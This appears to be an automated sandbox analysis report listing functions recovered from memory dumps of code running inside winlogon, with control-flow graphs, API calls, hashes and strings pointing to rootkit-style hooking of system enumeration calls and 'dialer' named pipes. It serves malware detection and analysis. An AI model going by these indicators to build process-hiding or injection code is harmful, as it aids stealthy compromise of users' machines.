                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50
                                                                                Function 000001E8589B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 571 1e8589b6910-1e8589b6916 572 1e8589b6951-1e8589b695b 571->572 573 1e8589b6918-1e8589b691b 571->573 576 1e8589b6a78-1e8589b6a8d 572->576 574 1e8589b6945-1e8589b6984 call 1e8589b6fc0 573->574 575 1e8589b691d-1e8589b6920 573->575 594 1e8589b6a52 574->594 595 1e8589b698a-1e8589b699f call 1e8589b6e54 574->595 577 1e8589b6922-1e8589b6925 575->577 578 1e8589b6938 __scrt_dllmain_crt_thread_attach 575->578 579 1e8589b6a8f 576->579 580 1e8589b6a9c-1e8589b6ab6 call 1e8589b6e54 576->580 582 1e8589b6931-1e8589b6936 call 1e8589b6f04 577->582 583 1e8589b6927-1e8589b6930 577->583 586 1e8589b693d-1e8589b6944 578->586 584 1e8589b6a91-1e8589b6a9b 579->584 592 1e8589b6ab8-1e8589b6aed call 1e8589b6f7c call 1e8589b6e1c call 1e8589b7318 call 1e8589b7130 call 1e8589b7154 call 1e8589b6fac 580->592 593 1e8589b6aef-1e8589b6b20 call 1e8589b7190 580->593 582->586 592->584 605 1e8589b6b22-1e8589b6b28 593->605 606 1e8589b6b31-1e8589b6b37 593->606 599 1e8589b6a54-1e8589b6a69 594->599 603 1e8589b69a5-1e8589b69b6 call 1e8589b6ec4 595->603 604 1e8589b6a6a-1e8589b6a77 call 1e8589b7190 595->604 621 1e8589b6a07-1e8589b6a11 call 1e8589b7130 603->621 622 1e8589b69b8-1e8589b69dc call 1e8589b72dc call 1e8589b6e0c call 1e8589b6e38 call 1e8589bac0c 603->622 604->576 605->606 610 1e8589b6b2a-1e8589b6b2c 605->610 611 1e8589b6b39-1e8589b6b43 606->611 612 1e8589b6b7e-1e8589b6b94 call 1e8589b268c 606->612 617 1e8589b6c1f-1e8589b6c2c 610->617 618 1e8589b6b45-1e8589b6b4d 611->618 619 1e8589b6b4f-1e8589b6b5d call 1e8589c5780 611->619 632 1e8589b6b96-1e8589b6b98 612->632 633 1e8589b6bcc-1e8589b6bce 612->633 624 1e8589b6b63-1e8589b6b78 call 1e8589b6910 618->624 619->624 636 1e8589b6c15-1e8589b6c1d 619->636 621->594 644 1e8589b6a13-1e8589b6a1f call 1e8589b7180 621->644 622->621 674 1e8589b69de-1e8589b69e5 __scrt_dllmain_after_initialize_c 622->674 624->612 624->636 632->633 641 1e8589b6b9a-1e8589b6bbc call 1e8589b268c call 1e8589b6a78 632->641 634 1e8589b6bd0-1e8589b6bd3 633->634 635 1e8589b6bd5-1e8589b6bea call 1e8589b6910 633->635 634->635 634->636 635->636 653 1e8589b6bec-1e8589b6bf6 635->653 636->617 641->633 668 1e8589b6bbe-1e8589b6bc6 call 1e8589c5780 641->668 661 1e8589b6a21-1e8589b6a2b call 1e8589b7098 644->661 662 1e8589b6a45-1e8589b6a50 644->662 658 1e8589b6c01-1e8589b6c11 call 1e8589c5780 653->658 659 1e8589b6bf8-1e8589b6bff 653->659 658->636 659->636 661->662 673 1e8589b6a2d-1e8589b6a3b 661->673 662->599 668->633 673->662 674->621 675 1e8589b69e7-1e8589b6a04 call 1e8589babc8 674->675 675->621
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700
                                                                                Function 000001E858956910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 464 1e858956910-1e858956916 465 1e858956918-1e85895691b 464->465 466 1e858956951-1e85895695b 464->466 468 1e85895691d-1e858956920 465->468 469 1e858956945-1e858956984 call 1e858956fc0 465->469 467 1e858956a78-1e858956a8d 466->467 470 1e858956a9c-1e858956ab6 call 1e858956e54 467->470 471 1e858956a8f 467->471 473 1e858956938 __scrt_dllmain_crt_thread_attach 468->473 474 1e858956922-1e858956925 468->474 487 1e85895698a-1e85895699f call 1e858956e54 469->487 488 1e858956a52 469->488 485 1e858956aef-1e858956b20 call 1e858957190 470->485 486 1e858956ab8-1e858956aed call 1e858956f7c call 1e858956e1c call 1e858957318 call 1e858957130 call 1e858957154 call 1e858956fac 470->486 477 1e858956a91-1e858956a9b 471->477 479 1e85895693d-1e858956944 473->479 475 1e858956927-1e858956930 474->475 476 1e858956931-1e858956936 call 1e858956f04 474->476 476->479 496 1e858956b31-1e858956b37 485->496 497 1e858956b22-1e858956b28 485->497 486->477 499 1e858956a6a-1e858956a77 call 1e858957190 487->499 500 1e8589569a5-1e8589569b6 call 1e858956ec4 487->500 491 1e858956a54-1e858956a69 488->491 502 1e858956b7e-1e858956b94 call 1e85895268c 496->502 503 1e858956b39-1e858956b43 496->503 497->496 501 1e858956b2a-1e858956b2c 497->501 499->467 514 1e8589569b8-1e8589569dc call 1e8589572dc call 1e858956e0c call 1e858956e38 call 1e85895ac0c 500->514 515 1e858956a07-1e858956a11 call 1e858957130 500->515 509 1e858956c1f-1e858956c2c 501->509 521 1e858956bcc-1e858956bce 502->521 522 1e858956b96-1e858956b98 502->522 510 1e858956b4f-1e858956b5d call 1e858965780 503->510 511 1e858956b45-1e858956b4d 503->511 517 1e858956b63-1e858956b78 call 1e858956910 510->517 532 1e858956c15-1e858956c1d 510->532 511->517 514->515 567 1e8589569de-1e8589569e5 __scrt_dllmain_after_initialize_c 514->567 515->488 535 1e858956a13-1e858956a1f call 1e858957180 515->535 517->502 517->532 530 1e858956bd5-1e858956bea call 1e858956910 521->530 531 1e858956bd0-1e858956bd3 521->531 522->521 529 1e858956b9a-1e858956bbc call 1e85895268c call 1e858956a78 522->529 529->521 561 1e858956bbe-1e858956bc6 call 1e858965780 529->561 530->532 546 1e858956bec-1e858956bf6 530->546 531->530 531->532 532->509 554 1e858956a45-1e858956a50 535->554 555 1e858956a21-1e858956a2b call 1e858957098 535->555 551 1e858956bf8-1e858956bff 546->551 552 1e858956c01-1e858956c11 call 1e858965780 546->552 551->532 552->532 554->491 555->554 566 1e858956a2d-1e858956a3b 555->566 561->521 566->554 567->515 568 1e8589569e7-1e858956a04 call 1e85895abc8 567->568 568->515
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                                Function 000001E85898CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                                  • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                                  • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                                  • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                                Function 000001E858982244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                                Function 000001E85898A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                                Function 000001E8589B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                                Function 000001E858959944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                                Function 000001E85898F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                                Function 000001E85898104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                                Function 000001E85898D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                                Function 000001E858987510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
                                                                                Function 000001E858989DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                                Function 000001E858993DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                                Function 000001E858982F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                                Function 000001E85898CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                                Function 000001E85898199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                                Function 000001E8589836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                                Function 000001E858988FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
